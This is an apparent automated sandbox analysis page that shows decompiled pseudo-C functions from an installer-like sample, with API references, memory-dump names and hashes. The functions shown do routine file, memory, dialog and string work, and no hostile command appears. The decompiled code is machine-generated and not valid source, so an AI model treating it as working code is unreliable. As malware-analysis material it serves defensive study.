0x70b22764
0x00000000
0x70b22769
0x70b22755
0x70b22756
0x70b2276a
0x70b2276a
0x70b22753
0x70b2276b
0x70b2276c
0x70b2276f
0x70b22783

APIs

Part of subcall function 70B212BB: GlobalAlloc.KERNEL32(00000040,?,70B212DB,?,70B2137F,00000019,70B211CA,-000000A0), ref: 70B212C5

GlobalFree.KERNEL32(?), ref: 70B22743
GlobalFree.KERNEL32(00000000), ref: 70B22778

Memory Dump Source

Source File: 00000000.00000002.1129932425.0000000070B21000.00000020.00000001.01000000.00000005.sdmp, Offset: 70B20000, based on PE: true

Associated: 00000000.00000002.1129862277.0000000070B20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1129989345.0000000070B24000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1130059756.0000000070B26000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70b20000_SecuriteInfo.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 44d28b79067a70280e178de1755168ab81e6950737304a8a828c94a13fdabc48
Instruction ID: 8b4446506f37803d1d4dac117e7459f5bc59623215f2c39466eb76a8f03c83a5
Opcode Fuzzy Hash: 44d28b79067a70280e178de1755168ab81e6950737304a8a828c94a13fdabc48
Instruction Fuzzy Hash: 4231AD72508101EFD7268F55EDD4D2E77FAFB893023244929F209C3631DB706E469B61

Uniqueness

Uniqueness Score: -1.00%

Function 00402950 Relevance: 9.1, APIs: 6, Instructions: 91
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00402950(int __ebx, void* __eflags) {
				WCHAR* _t26;
				void* _t29;
				long _t37;
				int _t49;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t59;
				void* _t60;
				void* _t61;

				_t49 = __ebx;
				_t52 = 0xfffffd66;
				_t26 = E00402DA6(0xfffffff0);
				_t55 = _t26;
				 *(_t61 - 0x40) = _t26;
				if(E00405E83(_t26) == 0) {
					E00402DA6(0xffffffed);
				}
				E00406008(_t55);
				_t29 = E0040602D(_t55, 0x40000000, 2);
				 *(_t61 + 8) = _t29;
				if(_t29 != 0xffffffff) {
					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
					if( *(_t61 - 0x28) != _t49) {
						_t37 =  *0x434f14;
						 *(_t61 - 0x44) = _t37;
						_t54 = GlobalAlloc(0x40, _t37);
						if(_t54 != _t49) {
							E004034E5(_t49);
							E004034CF(_t54,  *(_t61 - 0x44));
							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
							 *(_t61 - 0x10) = _t59;
							if(_t59 != _t49) {
								E004032B4( *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
								while( *_t59 != _t49) {
									_t60 = _t59 + 8;
									 *(_t61 - 0x3c) =  *_t59;
									E00405FE8( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
									_t59 = _t60 +  *(_t61 - 0x3c);
								}
								GlobalFree( *(_t61 - 0x10));
							}
							E004060DF( *(_t61 + 8), _t54,  *(_t61 - 0x44));
							GlobalFree(_t54);
							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
						}
					}
					_t52 = E004032B4( *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
					CloseHandle( *(_t61 + 8));
				}
				_t56 = 0xfffffff3;
				if(_t52 < _t49) {
					_t56 = 0xffffffef;
					DeleteFileW( *(_t61 - 0x40));
					 *((intOrPtr*)(_t61 - 4)) = 1;
				}
				_push(_t56);
				E00401423();
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t61 - 4));
				return 0;
			}

0x00402950
0x00402952
0x00402957
0x0040295c
0x0040295f
0x00402969
0x0040296d
0x0040296d
0x00402973
0x00402980
0x00402988
0x0040298b
0x00402997
0x0040299a
0x004029a0
0x004029ae
0x004029b3
0x004029b7
0x004029ba
0x004029c3
0x004029cf
0x004029d3
0x004029d6
0x004029e0
0x004029ff
0x004029ec
0x004029f4
0x004029f7
0x004029fc
0x004029fc
0x00402a06
0x00402a06
0x00402a13
0x00402a19
0x00402a1f
0x00402a1f
0x004029b7
0x00402a33
0x00402a35
0x00402a35
0x00402a3f
0x00402a40
0x00402a44
0x00402a48
0x00402a4e
0x00402a4e
0x00402a55
0x004022f1
0x00402c2d
0x00402c39

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
GlobalFree.KERNEL32(?), ref: 00402A06
GlobalFree.KERNEL32(00000000), ref: 00402A19
CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48

Memory Dump Source

Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
Instruction ID: 8fc1a79e9ee36ebd610a2d663d7387b5f1fea8f48d7bc9e01940cd119f3fb53c
Opcode Fuzzy Hash: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
Instruction Fuzzy Hash: 5831C271D00124BBCF216FA9CE49DDEBE79AF49364F14023AF450762E0CB794C429BA8

Uniqueness

Uniqueness Score: -1.00%

Function 70B22480 Relevance: 7.6, APIs: 5, Instructions: 135
memoryCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E70B22480(void* __edx) {
				void* _t37;
				signed int _t38;
				void* _t39;
				void* _t41;
				signed char* _t42;
				signed char* _t51;
				void* _t52;
				void* _t54;

				 *(_t54 + 0x10) = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8)) + 0x1014)) > 0x00000000;
				while(1) {
					_t9 =  *((intOrPtr*)(_t54 + 0x18)) + 0x1018; // 0x1018
					_t51 = ( *(_t54 + 0x10) << 5) + _t9;
					_t52 = _t51[0x18];
					if(_t52 == 0) {
						goto L9;
					}
					_t41 = 0x1a;
					if(_t52 == _t41) {
						goto L9;
					}
					if(_t52 != 0xffffffff) {
						if(_t52 <= 0 || _t52 > 0x19) {
							_t51[0x18] = _t41;
							goto L12;
						} else {
							_t37 = E70B2135A(_t52 - 1);
							L10:
							goto L11;
						}
					} else {
						_t37 = E70B212E3();
						L11:
						_t52 = _t37;
						L12:
						_t13 =  &(_t51[8]); // 0x1020
						_t42 = _t13;
						if(_t51[4] >= 0) {
						}
						_t38 =  *_t51 & 0x000000ff;
						_t51[0x1c] = 0;
						if(_t38 > 7) {
							L27:
							_t39 = GlobalFree(_t52);
							if( *(_t54 + 0x10) == 0) {
								return _t39;
							}
							if( *(_t54 + 0x10) !=  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x18)) + 0x1014))) {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) + 1;
							} else {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) & 0x00000000;
							}
							continue;
						} else {
							switch( *((intOrPtr*)(_t38 * 4 +  &M70B225F8))) {
								case 0:
									 *_t42 = 0;
									goto L27;
								case 1:
									__eax = E70B213B1(__ebp);
									goto L21;
								case 2:
									 *__edi = E70B213B1(__ebp);
									__edi[1] = __edx;
									goto L27;
								case 3:
									__eax = GlobalAlloc(0x40,  *0x70b2506c);
									 *(__esi + 0x1c) = __eax;
									__edx = 0;
									 *__edi = __eax;
									__eax = WideCharToMultiByte(0, 0, __ebp,  *0x70b2506c, __eax,  *0x70b2506c, 0, 0);
									goto L27;
								case 4:
									__eax = E70B212CC(__ebp);
									 *(__esi + 0x1c) = __eax;
									L21:
									 *__edi = __eax;
									goto L27;
								case 5:
									__eax = GlobalAlloc(0x40, 0x10);
									_push(__eax);
									 *(__esi + 0x1c) = __eax;
									_push(__ebp);
									 *__edi = __eax;
									__imp__CLSIDFromString();
									goto L27;
								case 6:
									if( *__ebp != __cx) {
										__eax = E70B213B1(__ebp);
										 *__ebx = __eax;
									}
									goto L27;
								case 7:
									 *(__esi + 0x18) =  *(__esi + 0x18) - 1;
									( *(__esi + 0x18) - 1) *  *0x70b2506c =  *0x70b25074 + ( *(__esi + 0x18) - 1) *  *0x70b2506c * 2 + 0x18;
									 *__ebx =  *0x70b25074 + ( *(__esi + 0x18) - 1) *  *0x70b2506c * 2 + 0x18;
									asm("cdq");
									__eax = E70B21510(__edx,  *0x70b25074 + ( *(__esi + 0x18) - 1) *  *0x70b2506c * 2 + 0x18, __edx,  *0x70b25074 + ( *(__esi + 0x18) - 1) *  *0x70b2506c * 2);
									goto L27;
							}
						}
					}
					L9:
					_t37 = E70B212CC(0x70b25044);
					goto L10;
				}
			}

0x70b22494
0x70b22498
0x70b224a3
0x70b224a3
0x70b224aa
0x70b224af
0x00000000
0x00000000
0x70b224b3
0x70b224b6
0x00000000
0x00000000
0x70b224bb
0x70b224c6
0x70b224d6
0x00000000
0x70b224cd
0x70b224cf
0x70b224e5
0x00000000
0x70b224e5
0x70b224bd
0x70b224bd
0x70b224e6
0x70b224e6
0x70b224e8
0x70b224ec
0x70b224ec
0x70b224ef
0x70b224ef
0x70b224f7
0x70b224ff
0x70b22502
0x70b225c1
0x70b225c2
0x70b225cd
0x70b225f7
0x70b225f7
0x70b225dd
0x70b225e9
0x70b225df
0x70b225df
0x70b225df
0x00000000
0x70b22508
0x70b22508
0x00000000
0x70b2250f
0x00000000
0x00000000
0x70b22517
0x00000000
0x00000000
0x70b22525
0x70b22527
0x00000000
0x00000000
0x70b22548
0x70b2254e
0x70b22551
0x70b22553
0x70b22563
0x00000000
0x00000000
0x70b22530
0x70b22535
0x70b22538
0x70b22539
0x00000000
0x00000000
0x70b2256f
0x70b22575
0x70b22576
0x70b22579
0x70b2257a
0x70b2257c
0x00000000
0x00000000
0x70b22588
0x70b2258b
0x70b22597
0x70b22599
0x00000000
0x00000000
0x70b225a5
0x70b225b1
0x70b225b4
0x70b225b6
0x70b225b9
0x00000000
0x00000000
0x70b22508
0x70b22502
0x70b224db
0x70b224e0
0x00000000
0x70b224e0

APIs

GlobalFree.KERNEL32(00000000), ref: 70B225C2

Part of subcall function 70B212CC: lstrcpynW.KERNEL32(00000000,?,70B2137F,00000019,70B211CA,-000000A0), ref: 70B212DC

GlobalAlloc.KERNEL32(00000040), ref: 70B22548
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 70B22563

Memory Dump Source

Source File: 00000000.00000002.1129932425.0000000070B21000.00000020.00000001.01000000.00000005.sdmp, Offset: 70B20000, based on PE: true

Associated: 00000000.00000002.1129862277.0000000070B20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1129989345.0000000070B24000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1130059756.0000000070B26000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70b20000_SecuriteInfo.jbxd

Similarity

API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
String ID:
API String ID: 4216380887-0
Opcode ID: f945e039c97906ee975ffd9a2190b4d60c441a67f280f84989b4ca5610a954c1
Instruction ID: 64e3dc2e31b39e61efba2ed8da5abc438f514bac7ad430031eccfae026b178f1
Opcode Fuzzy Hash: f945e039c97906ee975ffd9a2190b4d60c441a67f280f84989b4ca5610a954c1
Instruction Fuzzy Hash: 344190B1004205EFE725EF25EC80A1E77F8FBA4312B20891DF95AC7651EB70A745DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75
windowCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00401D81(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				WCHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t60;
				long _t63;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
				} else {
					E00402D84(2);
					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
				}
				_t55 =  *(_t65 - 0x24);
				 *(_t65 + 8) = _t30;
				_t60 = _t55 & 0x00000004;
				 *(_t65 - 0x38) = _t55 & 0x00000003;
				 *(_t65 - 0x18) = _t55 >> 0x1f;
				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
				} else {
					_t38 = E00402DA6(0x11);
				}
				 *(_t65 - 0x44) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x60);
				asm("sbb esi, esi");
				_t63 = LoadImageW( ~_t60 &  *0x434f00,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
					_push(_t63);
					E00406484();
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}

0x00401d81
0x00401d85
0x00401d9a
0x00401d87
0x00401d89
0x00401d8f
0x00401d8f
0x00401da0
0x00401da3
0x00401dad
0x00401db0
0x00401db8
0x00401dc9
0x00401dcc
0x00401dd7
0x00401dce
0x00401dd0
0x00401dd0
0x00401ddb
0x00401de5
0x00401e0c
0x00401e1b
0x00401e29
0x00401e31
0x00401e39
0x00401e39
0x00401e42
0x00401e48
0x00402ba4
0x00402ba4
0x00402c2d
0x00402c39

APIs

GetDlgItem.USER32(?,?), ref: 00401D9A
GetClientRect.USER32(?,?), ref: 00401DE5
LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
DeleteObject.GDI32(00000000), ref: 00401E39

Memory Dump Source

Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
Instruction ID: b69f8f45c5cbb28dd5603d9b1d667d2ce3d3910c133b75fee4ecc707c572ca23
Opcode Fuzzy Hash: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
Instruction Fuzzy Hash: 3321F672904119AFCB05DBA4DE45AEEBBB5EF08314F14003AFA45F62A0DB389951DB98

Uniqueness

Uniqueness Score: -1.00%

Function 70B216BD Relevance: 7.5, APIs: 5, Instructions: 41
memorylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E70B216BD(struct HINSTANCE__* _a4, short* _a8) {
				_Unknown_base(*)()* _t7;
				void* _t10;
				int _t14;

				_t14 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
				_t10 = GlobalAlloc(0x40, _t14);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t14, 0, 0);
				_t7 = GetProcAddress(_a4, _t10);
				GlobalFree(_t10);
				return _t7;
			}

0x70b216d7
0x70b216e3
0x70b216f0
0x70b216f7
0x70b21700
0x70b2170c

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,70B222D8,?,00000808), ref: 70B216D5
GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,70B222D8,?,00000808), ref: 70B216DC
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,70B222D8,?,00000808), ref: 70B216F0
GetProcAddress.KERNEL32(70B222D8,00000000), ref: 70B216F7
GlobalFree.KERNEL32(00000000), ref: 70B21700

Memory Dump Source

Source File: 00000000.00000002.1129932425.0000000070B21000.00000020.00000001.01000000.00000005.sdmp, Offset: 70B20000, based on PE: true

Associated: 00000000.00000002.1129862277.0000000070B20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1129989345.0000000070B24000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1130059756.0000000070B26000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70b20000_SecuriteInfo.jbxd

Similarity

API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
String ID:
API String ID: 1148316912-0
Opcode ID: 078bc33b9f749b0621b7a86fafb01cd95c8c3ea4aaa766e70d234a4a159a8ec2
Instruction ID: 60f06a0cd4f58890017107dde8e6526f8d26bb67821a0ee75fc5372a6fd1a779
Opcode Fuzzy Hash: 078bc33b9f749b0621b7a86fafb01cd95c8c3ea4aaa766e70d234a4a159a8ec2
Instruction Fuzzy Hash: 08F01C732061387BD63117A78C4CD9BBE9CDF8B2F5B210211F728921A18AA14D42D7F1

Uniqueness

Uniqueness Score: -1.00%

Function 00404D46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00404D46(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E0040657A(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E0040657A(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E0040657A(_t44, _t50, 0x42d268, 0x42d268, _a8);
				wsprintfW(_t34 + lstrlenW(0x42d268) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x433ed8, _a4, 0x42d268);
			}

0x00404d4f
0x00404d54
0x00404d5c
0x00404d5d
0x00404d6a
0x00404d72
0x00404d73
0x00404d75
0x00404d77
0x00404d79
0x00404d7c
0x00404d7c
0x00404d83
0x00404d89
0x00404d89
0x00404d90
0x00404d97
0x00404d9a
0x00404d9d
0x00404d9d
0x00404da1
0x00404db1
0x00404db3
0x00404db6
0x00404d5f
0x00404d5f
0x00404d66
0x00404d66
0x00404dbe
0x00404dc9
0x00404ddf
0x00404df0
0x00404e0c

APIs

lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,-00436000), ref: 00404DE7
wsprintfW.USER32 ref: 00404DF0
SetDlgItemTextW.USER32(?,0042D268), ref: 00404E03

Strings

%u.%u%s%s, xrefs: 00404DD1

Memory Dump Source

Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 8eaa60c285ed2ca3ba3cc070ccd72c3506245c9ef86633ed67cf81484c09c26b
Instruction ID: d7f2b51e3f2153b105aad6c1cbcae815e44f670c765de83d30fbb221df5484fa
Opcode Fuzzy Hash: 8eaa60c285ed2ca3ba3cc070ccd72c3506245c9ef86633ed67cf81484c09c26b
Instruction Fuzzy Hash: AC11D573A041283BDB10656DAC45E9E369CAF81334F254237FA66F21D1EA78D91182E8

Uniqueness

Uniqueness Score: -1.00%

Function 00405E0C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00405E0C(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}

0x00405e0d
0x00405e1a
0x00405e1b
0x00405e26
0x00405e2e
0x00405e2e
0x00405e36

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E12
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E1C
lstrcatW.KERNEL32(?,0040A014), ref: 00405E2E

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405E0C

Memory Dump Source

Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3355392842
Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
Instruction ID: 1a595bf39a0a3392b99637bd72bd9cca8666c17676e511d5d4bf90e80f698eee
Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
Instruction Fuzzy Hash: A8D0A731101930BAC2127B49EC08DDF62ACAE89340341443BF145B30A4CB7C5E5187FD

Uniqueness

Uniqueness Score: -1.00%

Function 70B210E1 Relevance: 6.4, APIs: 5, Instructions: 145
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E70B210E1(signed int _a8, intOrPtr* _a12, void* _a16, void* _a20) {
				void* _v0;
				void* _t27;
				signed int _t29;
				void* _t30;
				void* _t34;
				void* _t36;
				void* _t38;
				void* _t40;
				void* _t48;
				void* _t54;
				void* _t63;
				void* _t64;
				signed int _t66;
				void* _t67;
				void* _t73;
				void* _t74;
				void* _t77;
				void* _t80;
				void _t81;
				void _t82;
				intOrPtr _t84;
				void* _t86;
				void* _t88;

				 *0x70b2506c = _a8;
				 *0x70b25070 = _a16;
				 *0x70b25074 = _a12;
				_a12( *0x70b25048, E70B21651, _t73);
				_t66 =  *0x70b2506c +  *0x70b2506c * 4 << 3;
				_t27 = E70B212E3();
				_v0 = _t27;
				_t74 = _t27;
				if( *_t27 == 0) {
					L28:
					return GlobalFree(_t27);
				}
				do {
					_t29 =  *_t74 & 0x0000ffff;
					_t67 = 2;
					_t74 = _t74 + _t67;
					_t88 = _t29 - 0x66;
					if(_t88 > 0) {
						_t30 = _t29 - 0x6c;
						if(_t30 == 0) {
							L23:
							_t31 =  *0x70b25040;
							if( *0x70b25040 == 0) {
								goto L26;
							}
							E70B21603( *0x70b25074, _t31 + 4, _t66);
							_t34 =  *0x70b25040;
							_t86 = _t86 + 0xc;
							 *0x70b25040 =  *_t34;
							L25:
							GlobalFree(_t34);
							goto L26;
						}
						_t36 = _t30 - 4;
						if(_t36 == 0) {
							L13:
							_t38 = ( *_t74 & 0x0000ffff) - 0x30;
							_t74 = _t74 + _t67;
							_t34 = E70B21312(E70B2135A(_t38));
							L14:
							goto L25;
						}
						_t40 = _t36 - _t67;
						if(_t40 == 0) {
							L11:
							_t80 = ( *_t74 & 0x0000ffff) - 0x30;
							_t74 = _t74 + _t67;
							_t34 = E70B21381(_t80, E70B212E3());
							goto L14;
						}
						L8:
						if(_t40 == 1) {
							_t81 = GlobalAlloc(0x40, _t66 + 4);
							_t10 = _t81 + 4; // 0x4
							E70B21603(_t10,  *0x70b25074, _t66);
							_t86 = _t86 + 0xc;
							 *_t81 =  *0x70b25040;
							 *0x70b25040 = _t81;
						}
						goto L26;
					}
					if(_t88 == 0) {
						_t48 =  *0x70b25070;
						_t77 =  *_t48;
						 *_t48 =  *_t77;
						_t49 = _v0;
						_t84 =  *((intOrPtr*)(_v0 + 0xc));
						if( *((short*)(_t77 + 4)) == 0x2691) {
							E70B21603(_t49, _t77 + 8, 0x38);
							_t86 = _t86 + 0xc;
						}
						 *((intOrPtr*)( *_a12 + 0xc)) = _t84;
						GlobalFree(_t77);
						goto L26;
					}
					_t54 = _t29 - 0x46;
					if(_t54 == 0) {
						_t82 = GlobalAlloc(0x40,  *0x70b2506c +  *0x70b2506c + 8);
						 *((intOrPtr*)(_t82 + 4)) = 0x2691;
						_t14 = _t82 + 8; // 0x8
						E70B21603(_t14, _v0, 0x38);
						_t86 = _t86 + 0xc;
						 *_t82 =  *( *0x70b25070);
						 *( *0x70b25070) = _t82;
						goto L26;
					}
					_t63 = _t54 - 6;
					if(_t63 == 0) {
						goto L23;
					}
					_t64 = _t63 - 4;
					if(_t64 == 0) {
						 *_t74 =  *_t74 + 0xa;
						goto L13;
					}
					_t40 = _t64 - _t67;
					if(_t40 == 0) {
						 *_t74 =  *_t74 + 0xa;
						goto L11;
					}
					goto L8;
					L26:
				} while ( *_t74 != 0);
				_t27 = _v0;
				goto L28;
			}

0x70b210eb
0x70b21100
0x70b21109
0x70b2110e
0x70b21119
0x70b2111c
0x70b21125
0x70b21129
0x70b2112b
0x70b212b0
0x70b212ba
0x70b212ba
0x70b21132
0x70b21132
0x70b21137
0x70b21138
0x70b2113a
0x70b2113d
0x70b21256
0x70b21259
0x70b21271
0x70b21271
0x70b21278
